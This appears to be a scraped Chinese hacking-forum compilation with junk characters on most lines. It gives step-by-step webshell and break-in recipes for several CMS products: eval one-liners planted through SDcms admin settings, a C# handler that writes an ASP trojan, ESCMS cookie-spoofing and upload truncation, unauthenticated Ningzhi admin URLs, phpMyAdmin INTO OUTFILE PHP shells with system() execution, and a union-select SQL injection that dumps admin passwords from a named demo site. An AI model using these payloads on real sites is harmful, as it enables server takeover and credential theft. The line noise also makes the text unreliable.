) r( P, P1 M& j/ k, L* A& u<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">
) @$ b! ^+ T+ e. K# FUpload a new file:<br>! i2 G2 [* @ _8 n7 J/ R# F }
<input type="file" name="NewFile" size="50"><br>
. S* y: |9 h1 ], ?6 v& w<input id="btnUpload" type="submit" value="Upload">, z4 q: h' ^! A9 M4 d1 n R
</form>" O; [+ V/ Z' X; [/ D' [+ U o7 S6 J( F
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
/ v% e( X$ W3 s/ y" [1 u5 C! O! X+ Q
SDcms 后台拿webshell9 e' C5 n9 U2 F5 \
# ]! k* ?* P9 U7 U- L8 ]2 N第一种方法:' Q1 [3 e) P, x* r( t
进入后台-->系统管理-->系统设置-->系统设置->网站名称;
% G! c3 C9 O: w9 \3 D把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx
0 ]2 f/ ?: ?* p" k4 m' k用菜刀链接http://www.xxx.com/inc/const.asp 就搞定了。# W6 L! U6 h* f- ?
第二种方法:
1 s# o1 A# p6 R# S进入后台-->系统管理-->系统设置-->系统设置->上传设置;
, j7 c) i6 A8 J: r U3 t在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!
9 Y" T& M* Y! ~9 v8 J/ H2 f第三种方法:5 w2 q8 a8 y/ @) D4 y
进入后台-->界面管理-->模板文件管理-->创建文件
' U4 i d0 J7 {6 {+ }; r+ a8 e2 i文件名写入getshell.ashx
1 o8 h5 ?5 ]0 G8 d [2 m内容写入下面内容:. `6 x4 `: b# Y1 J. A8 h5 A* n
/====================复制下面的=========================/3 m- U; ]6 j- w% W1 ^/ r
<%@ WebHandler Language="C#" Class="Handler" %>
/ `' S. x9 ?9 V0 J5 d/ f* P/ @) lusing System;5 j+ y& U% l5 D8 T" A6 ^' d2 p
using System.Web;
$ d0 V2 X: L, ^, fusing System.IO;# R+ ?% A; }% `
public class Handler : IHttpHandler {
0 n3 _& b! I$ w' S/ Z0 Opublic void ProcessRequest (HttpContext context) {8 N% u1 _8 R- Z. J- c4 f# _
context.Response.ContentType = "text/plain";) Z6 q6 V/ E! S8 T( G
StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
0 r# X4 O( A3 Bfile1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");! q- C9 T5 C4 l9 t
file1.Flush();$ v. @ i- V7 P! W! o2 q8 S
file1.Close();
& a4 `1 p% M% ^/ I/ d}4 b8 m: H$ m: @5 k
public bool IsReusable {
& m6 t% a& ~0 M6 ]0 Y6 iget { l) s# Q! {6 o0 H
return false;
% D; {2 F8 d$ E5 g+ V( k" v}2 @3 K- m7 Q' ]# x" b G
}
( `. X0 C+ @1 n, S}7 O b. g9 M8 c; S# `% @% b
/=============================================/' [) D4 M) F* K: b5 e1 V
访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx% O5 r! ?9 F8 |3 u5 y
会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接' O- e: }' S' h' h" D0 w8 }5 u/ X
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------6 c4 Y, }. `! e4 e8 q3 j. B
; X l. N, w+ M8 X. U6 ^& i. AESCMS网站管理系统0day
6 y: S( D3 Y1 Z; _
6 U p: b7 v5 L' n$ l7 c后台登陆验证是通过admin/check.asp实现的
9 d0 Z* q9 Z; \8 A0 o6 f$ {
; ?! g( u1 M" f; ~首先我们打开http://target.com/admin/es_index.html
2 d2 x5 m; C! E1 ^然后在COOKIE结尾加上
! ?( R' P$ ~& U V; ESCMS$_SP2=ES_admin=st0p;
) p a2 ]& s, y1 _' X( K修改,然后刷新2 l& w$ m4 d9 ^; H* G2 X& F
进后台了嘎..
3 O) D1 E0 e8 I9 _" z然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL
; t5 l4 m$ I, F- `
- F& X# w) I0 \3 V( e! c4 W+ ^利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.# S* o+ j- U5 G2 X1 s& e7 V
嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp
8 u6 Q; I, D" P* Y- F; g+ r存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..
( D' ]8 R* z7 L5 K8 p% k在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了
8 K z+ @/ ^1 q! x" l Y* g------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ R# l" d" Q2 v/ R
: k7 e3 K0 w$ H- P* L a宁志网站管理系统后台无验证漏洞及修复
4 x- ]0 Y) x% F' S3 h$ E
( H& K5 t) h+ Q( E% l网上搜了一下,好像没有发布.如有雷同纯粹巧合!( o5 B9 o" E9 b& N( a- m. h
官方网站:www.ningzhi.net: k4 ]4 Z$ G- k2 [0 z: Y# U s/ j
学校网站管理系统 V.2011版本
2 f& T, x Z9 y6 j8 U- Ohttp://down.chinaz.com/soft/29943.htm
: `8 E. O# A* G$ b其它版本(如:政府版等),自行下载.1 r1 Z% z8 f+ L) x% ~
漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~
' D9 y( K7 L6 h/ F1 u0 Klogin.asp代码如下:8 e3 [2 z& A0 S; }( M8 e* A1 _" A
<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %> 5 s6 T4 c4 w5 J$ f+ x' u; h1 I" \& A
manage.asp代码我就不帖出来了.反正也没验证.
1 D {" P8 @8 k) P) Y7 X. O9 h只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!
9 P/ x: i) I/ k漏洞利用:
/ Y9 N. b5 f8 V! U直接访问http://www.0855.tv/admin/manage.asp- c, u" \: c: C* X
数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web59 P$ k2 W/ C5 R' @
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------' V& M: S y n" Y( n( H8 V, S7 z) }
7 h3 P6 r {, E% t# \. ]phpmyadmin拿shell的四种方法总结及修复
! H3 u+ \$ w8 ]; W8 S: E$ N6 j; k; F# t* k4 k3 a. c
方法一:& A* g, B/ `2 S }
CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );' |, P S4 d! N9 z+ @( j
INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');
4 O& D* F0 t( h( T7 F q% P1 G" WSELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
% H/ B$ G% I5 c2 ^- S----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php
8 O. @+ q$ T4 W! W7 H 一句话连接密码:7on
5 \' ]$ `2 [$ J2 P5 [, E/ F2 G8 m方法二:
. H1 R" {9 r3 Z9 L6 z0 c读取文件内容: select load_file('E:/xamp/www/s.php');6 E% k* a' b2 V/ h* _3 p- S6 R
写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'
1 S) h4 p" {8 E" k% a2 E5 V# h X6 Icmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
9 }5 d/ \8 |" Z$ y! g方法三:
6 @% \9 j) x2 V" dJhackJ版本 PHPmyadmin拿shell3 P+ {$ a5 t1 N% g ]) P
Create TABLE study (cmd text NOT NULL);
' l! B: u, f- @: E8 Z: z! c8 j, W0 |Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');' |- X% n2 R7 ?
select cmd from study into outfile 'E:/wamp/www/7.php';
h7 Q, s* c4 xDrop TABLE IF EXISTS study;# w4 F- j- g9 A- ~0 s; r8 u+ t. E3 H
<?php eval($_POST[cmd])?>
0 d# y- [7 [9 K$ R3 dCREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
% ^& c5 i% } {5 @9 v6 ~INSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1, Q, u6 `: y9 ^0 n" v# d) [
SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 14 p( b2 }' v% H: M, v% h
DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
; U# M: [( ?) h% f+ j& G8 D方法四:4 O0 d; m9 u$ ~7 F
select load_file('E:/xamp/www/study.php');
9 g' }6 L0 y; S1 Y# C, oselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'! C z- G6 |$ V# U; w
然后访问网站目录:http://www.2cto.com/study.php?cmd=dir
4 q) n l; H/ f$ I& K; v7 y-----------------------------------------------------------------------------------------------------------------------------------------------------------------------+ {5 e; Y; v, F4 k' f
' B2 g" V9 B; T9 X8 o% yNO.001中学网站管理系统 Build 110628 注入漏洞. s6 k v; r5 M# v) V S0 Z5 ~
1 I/ ^& Z# `4 N' DNO.001中学网站管理系统功能模块:) X" Z# B! v3 ^8 K& f! c; I
1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等) ?1 o" o4 c$ P: U8 a9 B/ Z
2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息
' r' L1 t' B5 X* O' a' n$ c# {3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息% ~( [0 D9 M& L
4.视频图片管理:一级分类,动态添加视频或者图片等信息
5 h5 H$ f8 ]+ H0 ~5.留言管理:对留言,修改,删除、回复等管理2 O. x+ Y/ i! \
6.校友频道:包括校友资料excel导出、管理等功能9 D% w+ n5 |$ \- f5 ]
7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页
3 r# Z8 z3 Q' o- i' Y% t2 L默认后台:admin/login.asp) v0 J3 n7 K. a4 G/ O$ e
官方演示:http://demo.001cms.net2 j8 O4 g+ T1 z
源码下载地址:http://down.chinaz.com/soft/30187.htm H9 M" V% q* i8 P5 @& p0 h
EXP:/ i4 u) P% }6 Y" r9 L1 u
union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
' W; S$ D' {' j) t1 v% ]( i, t9 s* i测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin/ e2 k- E5 X" Q1 p
getshell:后台有备份,你懂的: [. d2 M! M. \0 }, j4 v
另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。, B, G$ _( p' O* X; o- Z
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |